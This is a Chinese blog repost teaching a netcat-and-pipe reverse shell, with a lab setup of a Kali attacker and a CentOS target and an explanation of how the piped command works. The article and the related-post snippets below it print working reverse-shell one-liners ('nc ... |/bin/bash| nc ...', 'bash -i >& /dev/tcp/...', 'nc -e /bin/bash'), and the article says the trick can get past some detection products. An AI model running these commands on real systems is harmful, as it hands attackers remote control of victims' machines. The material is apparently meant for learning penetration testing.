nc+管道符的一种反弹shell姿势

最新推荐文章于 2024-07-24 21:24:56 发布
最新推荐文章于 2024-07-24 21:24:56 发布
阅读量962 收藏 2
点赞数
文章标签: shell 网络 操作系统
原文链接:http://www.cnblogs.com/Id3al/p/9382426.html
版权

一.什么叫反弹shell?

  在计算机科学中,Shell俗称壳(用来区别于核),是指“提供使用者使用界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序,这是来自百度百科的解释,通俗点就是说shell是一个用来执行命令的软件,比如我们常见的windows系统下的cmd.exe、powershell,linux下的bash、ksh、zsh等,那什么叫反弹shell呢,反弹shell就是将目标的shell反弹到本地来,这样在本地shell上操作就相当于在操作远程主机上的shell。

二.常见的反弹shell都有哪些?

  反弹shell的姿势有很多,网上师傅们也有整理了各种文章,知识面有多广,姿势就有多猥琐,我就目前常见的简单说一下:bash反弹、nc、php、python、telnet、ruby等,具体的使用方法网上都有就不细说了,下面说个我遇到的认为不错的反弹shell的方法,NC+linux中的管道符反弹shell,嗯,据说类似的方法可以绕过某些安全产品对反弹shell的检测。

三.实际操作

攻击机:Kali2.0 192.168.128.133

目标机:Centos7 192.168.128.149

kali上的执行的命令(需要打开两个终端分别执行)

nc -lvp 4444

nc -lvp 5555

如下图所示:

centos7上执行如下命令

nc 192.168.128.133 4444|/bin/bash|nc 192.168.128.133 5555

如下图所示:

此时查看kali的两个终端,发现已经显示连接成功

这是在kali终端1上执行的命令将会在kali终端2上显示出来,如下所示:

 三.原理解释

  上面就是nc+管道符执行后的效果,那原理是什么呢,我们常用的不是直接在攻击机上反弹shell后直接在攻击机上执行就行吗?为何kali需要开启两个终端监听?别急下面就来解释下原因

  我们把nc 192.168.128.133 4444 |/bin/bash| nc 192.168.138.133 5555 命令分解来看看

  我们先来看看在centos7上执行nc 192.168.128.133 4444和kali上执行nc -lvp 4444是什么效果

此时已经连接上,这时执行命令试试

这时执行命令你会发现不管你在哪一方的终端上执行,另一边都会把你执行的东西原样显示出来,这种在nc中也叫聊天室,同样的后面的nc 192.168.128.133 5555也是一样的

/bin/bash在linux中就代表当前使用的shell(shell有很多,目前在这儿只说bash),| 管道符在linux中代表将管道符前面的结果作为管道符后面的输入,在这里解释就是将在kali终端1上执行的命令在centos7上作为输入执行

因此当我们在kali终端1上执行ls后,ls会作为输入传递到centos7的bash上作为输入,在bash执行完ls后会将结果又作为输入传递到kali的终端2上显示出来,总体来说这条命令真的很 ”皮”。

四.总结

类似的命令还有很多种,这条命令只是入门级别的,世间骚操作千千万,很多还需要我们去静下心去学习、发现

参考链接:

http://www.freebuf.com/articles/system/178150.html

http://www.freebuf.com/articles/system/153986.html

转载于:https://www.cnblogs.com/Id3al/p/9382426.html

bansu1062
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
qq_51577576的博客
08-03 1739
攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell。...
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1400
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
内网渗透之Linux反弹shell(综合)
墨鱼菜鸡
09-10 1377
目录 知识点 Linux mkfifo命令基本用法 1.首先了解linux命令执行顺序 2.然后了解下管道命令(pipe) 3.常见管道命令 4.mkfifo则可以创建命名管道 Linux标准文件描述 更改标准输出的位置 更改标准输入的位置 /dev/null 重定向 输入重定向 输出重定向 管道 环境 01NC正向Sh...
NC反弹Shell
qq_23066945的博客
11-23 638
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
反弹shell的方式——之NC反弹shell
最新发布
aihua002的博客
07-24 405
反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell
反弹shell原理
Monica的博客
11-01 2338
原理 反弹shell(reverse shell),就是攻击端(本机)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 实验案例 实验环境: 攻击端:mac ip地址:192.168.57.252 受害端:kali linux ip地址:10.211.5519 nc反弹: 攻击端mac终端输入: nc ...
linux反弹shell的原理
热门推荐
Shanfenglan's blog
08-24 27万+
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为...正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
Linux下NC反弹shell命令(推荐)
09-15
网络安全和渗透测试中,反弹Shell一种常见的技术,它允许攻击者远程控制受感染的系统。在Linux环境中,网络工具`nc`(Netcat)常被用来创建这种连接。本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作...
linux+反弹shell原理,linux反弹shell的原理详解
weixin_36163504的博客
05-13 306
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
nc的使用+反弹shell
2301_80366980的博客
02-18 906
记录学习linux中nc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
反弹shell原理和实现
u012830303的博客
01-18 3528
当一些框架和代码,不小心让可执行shell命令的函数存在注入漏洞时,会被利用注入漏洞执行一些shell命令。入侵者为了防止漏洞被修复,无法通过正向链接侵入服务器时,会被利用shell反弹原理种马。 首先,侵入者会利用注入参数,创建一个shell.php文件,文件内容如下 通过web访问并执行shell.php文件 exec('bash -i &> /dev/tcp/10.201.61.194/5566 0>&1'); 这条命令的作用是,在服务器建立一个可以与10.201.61.
反弹Shell原理与实现
m0_62451321的博客
11-14 3221
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
反弹shell原理与实现
hengliang_的博客
03-09 1864
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的.
反弹shell
weixin_43148062的博客
04-24 574
什么是反弹shell NC使用 NC正向连接 NC反向连接 bash反弹shell 一、什么是反弹shell 通常我们通过web应用某漏洞成功拿到了webshell后,接下来我们往往更像直接获得一个虚拟终端,来方便更好的做后续的渗透。 shell是操作主机的接口,反弹shell就是把shell送给别人,让其他人可以操作自己的计算机。 回到顶部 二、NC使用 NC(netcat)被称为网络...
反弹shell初识
无痕的博客
11-01 4083
反弹shell的指令与演示
[渗透测试]反弹shell原理
weixin_47224111的博客
11-23 2789
反弹shell 反弹shell本质就是控制端监听在某TCP/UDP端口,被控制端发起请求到该端口,并将其命令行的输入输出转到控制端 涉及到的基本概念: Linux文件描述 文件描述 缩写 描述 0 STDIN 标准输入 1 STDOUT 标准输出 2 STDERR 标准错误输出 在Linux里,所有的东西都是文件,而linux使用文件描述来标识每个文件对象。包括我们电脑的显示器和键盘,他们都有相应的文件描述与之对应。 重定向 重定向主要分为两种 输入重定向 &
NC 反弹shell
08-30
NC反弹shell一种利用NetCat工具实现的一种技术,用于在目标机器和控制机器之间建立一个反向连接,并获得对目标机器的控制权。在反弹shell中,目标机器先执行NC命令,将shell连接到控制机器上的NC监听端口,从而使控制机器能够控制目标机器。 有几种方法可以实现NC反弹shell。其中一种是使用bash反弹,命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 请注意,这种方法需要在控制机器上执行。 另一种方法是使用NC命令进行反向连接,命令如下: ``` nc -e /bin/bash 192.168.0.4 7777 ``` 这种方法适用于在CentOS或Ubuntu上使用。 还有一种方法是使用php反弹shell,需要目标机器安装NC。命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 同样,这种方法需要在控制机器上执行。 总而言之,NC反弹shell一种通过建立反向连接实现对目标机器的控制的技术。可以使用不同的方法来实现反弹shell,如bash反弹和php反弹。这些方法需要根据具体情况和系统进行选择和执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [详解NC反弹shell的几种方法](https://download.csdn.net/download/weixin_38664159/14048091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [NC反弹shell的几种方法](https://blog.csdn.net/qq_59350385/article/details/124733038)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值